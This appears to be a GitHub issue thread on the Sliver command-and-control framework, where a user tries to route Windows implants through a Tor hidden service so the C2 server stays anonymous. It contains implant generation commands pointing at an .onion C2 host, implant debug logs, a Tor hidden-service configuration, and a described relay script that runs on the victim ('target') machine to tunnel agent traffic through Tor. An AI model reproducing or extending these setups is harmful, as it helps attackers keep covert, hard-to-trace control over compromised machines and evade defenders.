Open pixelBaron117 opened 1 month ago
```
generate --http [hidden].onion:6969?proxy=127.0.0.1:9050 -o windows -G -d -O dbg
sliver > jobs
ID   Name   Protocol   Port   Stage Profile
==== ====== ========== ====== ===============
11   http   tcp        6969
```
Output:
```
2024/05/22 20:35:30 session.go:172: Connecting -> http(s)://[hidden].onion:6969
2024/05/22 20:35:30 session.go:84: Next CC = https://[hidden].onion:6969?proxy=127.0.0.1:9050
2024/05/22 20:35:30 drivers_windows.go:36: Using go http driver
2024/05/22 20:35:30 transports.go:92: Yield c2 uri = 'https://[hidden].onion:6969?proxy=127.0.0.1:9050'
2024/05/22 20:35:30 gohttp.go:97: Force proxy "127.0.0.1:9050"
2024/05/22 20:35:30 httpclient.go:652: [http] segments = [], filename = rpc, ext = php
2024/05/22 20:35:30 crypto.go:217: TOTP Code (2024-05-22 18:35:30.2354917 +0000 UTC): [hidden]
2024/05/22 20:35:30 httpclient.go:339: [http] POST -> https://[hidden].onion:6969/rpc.html?b=[hidden]&sm=[hidden] (266 bytes)
2024/05/22 20:35:30 httpclient.go:345: [http] http response error: Post "https://[hidden].onion:6969/rpc.html?b=[hidden]&sm=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 drivers_windows.go:36: Using go http driver
2024/05/22 20:35:30 gohttp.go:97: Force proxy "127.0.0.1:9050"
2024/05/22 20:35:30 httpclient.go:652: [http] segments = [], filename = register, ext = php
2024/05/22 20:35:30 crypto.go:217: TOTP Code (2024-05-22 18:35:30.2394831 +0000 UTC): [hidden]
2024/05/22 20:35:30 httpclient.go:339: [http] POST -> http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden] (266 bytes)
2024/05/22 20:35:30 httpclient.go:345: [http] http response error: Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 session.go:178: http(s) connection error Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 sliver.go:158: [session] failed to establish connection: Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 sliver.go:138: Reconnect sleep: 1m0s
```
It seems the proxy is correctly used, but the sessions can't connect to the hidden service.
The hidden service Tor configuration:
```
# This is the configuration for Tor
SocksPort 9050 #
# HiSer
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 6969 127.0.0.1:6969
```
Based on the debug output, the implant seems to behave correctly, using the proxy and sending HTTP requests. According to my information, the Tor proxy is compatible with standard HTTP requests. Therefore, I don't understand why it isn't working.
While waiting for potential integration into Sliver, I've created a Python script that serves as a relay to route communications through the Tor network using an mTLS agent.

How it works:

1. Agent communication: the Sliver agent is configured to communicate with 127.0.0.1:6666, thinking it is directly talking to the Sliver C2 server.
2. Proxy on the target: a Python proxy script runs on the target machine and listens on 127.0.0.1:6666 for incoming connections from the Sliver agent.
3. Redirection through Tor: the proxy script establishes a connection to the Sliver C2 server using the Tor network. This is done through a SOCKS5 proxy running on 127.0.0.1:9050 towards the hidden service (.onion address).
4. Data forwarding: the script forwards all data from the Sliver agent to the Sliver C2 server through Tor and sends back responses to the agent, ensuring seamless bidirectional communication.

Detailed setup:

- Sliver C2 server: the Sliver C2 server listens on port 9999 for incoming connections.
- Tor hidden service: configure the hidden service to listen on port 9999 and forward traffic to port 9999 on the Sliver C2 server. The .onion address of this hidden service is used by the proxy script to route traffic through Tor.
- Python proxy script: the proxy script runs on the target machine. It listens on 127.0.0.1:6666 for connections from the Sliver agent. When a connection is received, the proxy script uses PySocks to establish a connection to the hidden service address through the Tor network. It then forwards all data from the Sliver agent to the Sliver C2 server through the Tor network and vice versa.

This setup allows the mTLS agent to route its communications securely through the Tor network without any modifications to the Sliver agent itself.
Hello,
I've done some research but couldn't find a clear answer to my question.
Sliver supports handling HTTP proxies, but apparently not SOCKS5 proxies.
Therefore, I would like to know if it is possible to configure a beacon to use a pre-installed SOCKS5 proxy on the client.
For example:
```
generate beacon --http dasdasdas.onion --proxy socks5://127.0.0.1:9050 --os windows --arch amd64 --format exe --save /var/www/html
```
The goal is to keep the C2 anonymous without expensive intermediary servers.
As a starting solution, I found tor2web, but the domains are not stable over time, which reduces the robustness of the link (if a domain no longer works, then the beacon is no longer reachable). Setting up a tor2web instance reduces anonymity and has a certain cost.
Thank you in advance.